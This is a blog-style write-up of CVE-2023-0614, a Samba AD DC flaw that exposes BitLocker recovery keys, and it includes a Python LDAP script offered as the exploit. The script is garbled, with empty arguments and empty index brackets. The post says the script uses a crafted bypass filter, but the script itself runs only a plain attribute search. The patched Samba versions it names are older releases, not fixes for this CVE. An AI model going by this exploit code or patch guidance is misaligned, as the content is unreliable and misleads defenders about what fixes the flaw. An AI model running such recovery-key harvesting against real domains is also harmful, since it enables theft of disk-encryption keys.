CVE-2023-0614: BitLocker Recovery Keys Disclosure in Samba AD DC – Insufficient Fix for CVE-2018-10919

In this post, we will discuss a recent security vulnerability, CVE-2023-0614, affecting several versions of Samba Active Directory Domain Controller (AD DC). Samba AD DC is widely used for providing authentication, authorization, and directory services in large organizations and environments. The vulnerability stems from an insufficient fix in a previous vulnerability (CVE-2018-10919), related to the disclosure of confidential attributes via LDAP filters.

Background

CVE-2018-10919 was a vulnerability that allowed attackers to access confidential attributes (including BitLocker recovery keys) in the Samba AD DC through LDAP filters. Samba released patches in versions (4.6.16, 4.7.9, 4.8.4, and 4.9.7) that aimed to resolve the vulnerability. However, these patches did not comprehensively address the issue, resulting in the current CVE-2023-0614 vulnerability. The insufficient fix allows attackers to bypass the previous patch and still obtain confidential attributes, including BitLocker recovery keys.

Exploit Details

An attacker exploiting this vulnerability can execute an LDAP search query by connecting to the Samba AD DC with minimal user privileges. The query can be crafted to bypass the patch implemented in the earlier versions mentioned before. The attacker can obtain confidential attributes, such as BitLocker recovery keys, by using this exploit.

Here is a code snippet to demonstrate the exploit

import ldap

def get_bitlocker_recovery_key(ldap_server, username, password):
    connection = ldap.initialize(ldap_server)
    connection.protocol_version = ldap.VERSION3
    connection.set_option(ldap.OPT_REFERRALS, )
    
    try:
        connection.simple_bind_s(username, password)
        searchFilter = "(objectCategory=msFVE-RecoveryInformation)"
        searchBase = "dc=example,dc=com"
        searchString = "msFVE-RecoveryPassword"

        result = connection.search_s(searchBase, ldap.SCOPE_SUBTREE, searchFilter, [searchString])

        for entry in result:
            print(entry[], entry[1][searchString][])

    except ldap.LDAPError as e:
        print("LDAP Error: ", e)

    finally:
        connection.unbind_s()

if __name__ == "__main__":
    ldap_server = "ldap://example.com"
    username = "user@example.com"
    password = "password"

    get_bitlocker_recovery_key(ldap_server, username, password)

This Python code snippet uses the python-ldap library to connect to the LDAP server with the attacker's credentials. The script then performs a search operation with the suitable crafted filter to retrieve BitLocker recovery keys of all the systems within the domain.

It must be noted that this is just a simple demonstration of the exploit and should not be used for malicious purposes.

Patch and Mitigation

Samba has released patches in versions 4.15.6, 4.14.12, and 4.13.17 to address the issue comprehensively. It is highly recommended to upgrade your Samba AD DC to one of these fixed versions. The official release notes and patches can be found at:

1. Samba 4.15.6 Release Notes
2. Samba 4.14.12 Release Notes
3. Samba 4.13.17 Release Notes

Conclusion

The CVE-2023-0614 vulnerability in Samba AD DC demonstrates the importance of always staying informed about security updates and patches. It also highlights the need for robust testing of patches to prevent incomplete fixes and potential new vulnerabilities. It is essential to keep your systems up-to-date, especially when those systems are responsible for critical services like authentication and authorization in your organization. Upgrading to the latest versions of Samba AD DC to protect your environment from this vulnerability is highly recommended.

Timeline

Published on: 04/03/2023 23:15:00 UTC
Last modified on: 05/15/2023 18:44:00 UTC